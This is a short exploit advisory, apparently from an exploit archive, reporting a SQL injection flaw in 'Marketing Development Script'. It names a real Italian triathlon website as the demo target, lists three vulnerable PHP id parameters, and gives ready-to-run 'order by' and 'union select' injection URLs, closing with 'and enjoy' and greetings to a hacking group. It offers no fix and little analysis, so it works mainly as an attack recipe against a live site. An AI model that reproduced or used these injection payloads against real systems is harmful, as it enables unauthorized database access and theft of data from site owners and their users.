Marketing Development Script suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
816b7dc9c9a2bbe23adaa3f6f0f601680eb913d47b0ce8a3bce8fa4877d96630
# Exploit Title; Marketing Development Script SQL Injection Vulnerability
# Date; 3/12/12
# Author; 3spi0n
# Script Vendor or Software Link; http://www.marketingdev.com/
# Category; Webapps
# Type; SQL Injection [MySQLi]
# Tested on; Ubuntu 12.10 / Win7 / Backtrack 5
[#] Demo Analyzing ;
http://www.feralpitriathlon.it/gazzettino_articolo.php?id=90' [MySQLi Vuln.]
[#] Vulnerable Details ;
- MySQLi Vulnerable on sites
[#] Vulnerable Files ;
gazzettino_articolo.php?id= [query, variant of gazzettino_articolo.php file]
album.php?id= [query, variant of album.php file]
atleta.php?id= [query, variant of atleta.php file]
[#] Exploit ;
Order by command = gazzettino_articolo.php?id=4+order+by+8
Union Select command =
/gazzettino_articolo.php?id=4+union+select+1,2,3,4,5,6,7
and enjoy.
[#] Greetz ;
- Grayhatz Corporation
- My Official Blog, www.Ryuzaki.in
- Facebook.Com/3spi0ne - Twitter.Com/bariiiscan